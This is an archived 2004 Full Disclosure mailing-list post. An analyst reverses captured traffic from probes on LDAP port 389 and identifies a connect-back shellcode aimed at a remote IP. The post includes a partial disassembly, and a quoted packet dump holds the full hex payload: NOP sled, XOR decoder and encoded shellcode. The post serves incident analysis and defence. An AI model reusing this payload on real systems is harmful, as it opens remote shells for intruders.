Full Disclosure mailing list archives
(no subject)
From: "Disclosure From OSSI" <disclosure () ossecurity ca>
Date: Thu, 26 Feb 2004 00:13:28 -0500
We grabbed the binary data from the sniff'ed below. After a quick reverse, it turns out to be a connect-back shellcode with back server p-> 24.19.147.225. Partially disassembled: 00000084 68 18 13 93 E1 push 0E1931318h 00000089 68 02 00 22 E4 push 0E4220002h 0000008E 8B CC mov ecx, esp 00000090 6A 10 push 10h 00000092 51 push ecx 00000093 FF 76 24 push dword ptr [esi+24h] 00000096 FF D0 call eax = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = The following info was automatically generated by "OSAnalyzer" program. = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = call eax=776ba5a3 776ba5a3 = WS2_32.dll!connect with para 3 Para 0 is socket # 00000094 Para 1 is name p-> 00dafcc4 Para 2 is namelen 00000010 sin_family AF_INET , port 8932 IP 24.19.147.225 call external 776ba5a3 stack 0000000c return ffffffff ; =================== a quick translation ================================= C:\TEMP>ping -a 24.19.147.225 Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of data Hope the info is useful to you. Regards Peter Huang Peter.Huang AT ossecurity.ca http://www.ossecurity.ca/
Date: Wed, 25 Feb 2004 08:46:26 -0800 From: John Sage <jsage () finchhaven com> To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Probes on port 389 Just picked this up: On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:From: "Schmehl, Paul L" <pauls () utdallas edu> To: <intrusion () sans org>, <full-disclosure () lists netsys com> Subject: [Full-disclosure] Probes on port 389 Date: Tue, 24 Feb 2004 11:06:50 -0600 I threw up a quick rule on snort to monitor probes on port 389 because I have been seeing entries in /var/log/messages on some boxes that I am responsible for. This morning we had a probe that hit 26205 different IPs on that port in about 7 minutes (SYN scan only - no payload.) The source IP was a mailserver in England. (They've been notified.)/* snip */ input: snort.log.1077660886 filter: ip and ( src host 24.6.176.211 ) # T 2004/02/25 08:08:15.042588 24.6.176.211:220 -> 24.19.147.xxx:389 [S] # T 2004/02/25 08:08:15.092297 24.6.176.211:220 -> 24.19.147.xxx:389 [R] # T 2004/02/25 08:08:15.097128 24.6.176.211:2211 -> 24.19.147.xxx:389 [S] # T 2004/02/25 08:08:15.146174 24.6.176.211:2211 -> 24.19.147.xxx:389 [A] # T 2004/02/25 08:08:15.154158 24.6.176.211:2211 -> 24.19.147.xxx:389 [A] 30 82 0a 3d 02 01 01 60 82 01 36 02 ff ff ff ff 0..=...`..6..... 50 a9 f7 00 10 13 90 90 90 90 90 90 90 90 90 90 P............... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 eb 02 eb 05 e8 f9 ff ................ ff ff 5b 80 c3 10 33 c9 66 b9 33 01 80 33 95 43 ..[...3.f.3..3.C e2 fa 14 79 05 94 95 95 1e 61 c0 c3 f1 34 a5 95 ...y.....a...4.. 95 95 1e d5 99 1e e5 89 38 1e fd 9d 7e 95 1e 50 ........8...~..P cb c8 1c 93 6a a3 fd 1b db 9b 79 7d 38 95 95 95 ....j.....y}8... fd a6 a7 95 95 fd e2 e6 a7 ca c1 6a 45 1e 6d c2 ...........jE.m. fd 4c 9c 60 38 7d 06 95 95 95 a6 5c c4 c4 c4 c4 .L.`8}.....\.... d4 c4 d4 c4 6a 45 1c d3 b1 c2 fd 79 6c 3f f5 7d ....jE.....yl?.} ec 95 95 95 fd 8d 86 06 74 fd 97 95 b7 71 1e 59 ........t....q.Y ff 85 c4 6a e3 b1 6a 45 fd f6 f8 f1 95 1c f3 a5 ...j..jE........ 6a a3 fd e7 6b 26 83 7d c4 95 95 95 1c d3 8b 16 j...k&.}........ 79 c1 18 a9 b1 a6 55 a6 5c 16 54 80 3e 77 68 53 y.....U.\.T.>whS d1 b1 85 d1 6b d1 b1 a8 6b d1 b1 a9 1e d3 b1 1c ....k...k....... d1 b1 dd 1c d1 b1 d9 1c d1 b1 c5 18 d1 b1 85 c1 ................ c5 c4 c4 c4 ff 94 c4 c4 6a e3 a5 c4 6a c3 8b 6a ........j...j..j a3 fd 7a 5b 75 f5 7d 97 95 95 95 6a 45 c6 c0 c3 ..z[u.}....jE... c2 1e f9 b1 8d 1e d0 a9 1e c1 90 ed 96 40 1e df .............@.. 8d 1e cf b5 96 48 76 a7 dc 1e a1 1e 96 60 a6 6a .....Hv......`.j 69 a6 55 39 af 51 e1 92 54 5a 98 96 6d 7e 67 ae i.U9.Q..TZ..m~g. e9 b1 81 e0 74 1e cf b1 96 48 f3 1e 99 de 1e cf ....t....H...... 89 96 48 1e 91 1e 96 50 7e 97 a6 55 1e 40 ca cb ..H....P~..U.@.. c8 ce 57 91 95 90 90 90 90 90 90 90 90 90 90 90 ..W.............
... deleted ... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: (no subject), (continued)
- Re: (no subject) Valdis . Kletnieks (Feb 07)
- Re: (no subject) KF (Feb 07)
- (no subject) roberta bragg (Feb 11)
- Re: (no subject) madsaxon (Feb 11)
- Re: (no subject) Berend-Jan Wever (Feb 11)
- Re: (no subject) Lee (Feb 11)
- Security Watch Essay (was: (no subject)) Cael Abal (Feb 11)
- RE: Security Watch Essay (was: (no subject)) roberta bragg (Feb 11)
- Re: (no subject) madsaxon (Feb 11)
- (no subject) James Patterson Wicks (Feb 13)
- (no subject) disclosure (Feb 24)
- (no subject) Disclosure From OSSI (Feb 25)
- (no subject) Bruce Zhang (Feb 27)